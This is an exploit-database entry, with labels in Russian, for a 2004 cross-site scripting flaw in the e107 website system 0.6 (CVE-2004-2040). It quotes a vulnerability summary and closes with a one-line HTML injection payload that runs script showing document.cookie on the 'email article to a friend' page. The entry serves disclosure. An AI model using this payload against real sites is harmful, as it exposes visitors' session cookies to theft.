Exploit e107 website system 0.6 - 'email article to a friend' Feature Cross-Site Scripting

[Exploiter]

EDB-ID

24154

Проверка EDB

1. Пройдено

Автор

JANEK VIND

Тип уязвимости

WEBAPPS

Платформа

PHP

CVE

cve-2004-2040

Дата публикации

2004-05-29

source: https://www.securityfocus.com/bid/10436/info
 
e107 is prone to multiple cross-site scripting, HTML injection, file inclusion, and SQL injection vulnerabilities. This may compromise various security properties of a Web site running the software, including allowing remote attackers to execute malicious PHP code.
 
- HTML injection in the "email article to a friend" and "submit news" pages.:

foobar'><body onload=alert(document.cookie);>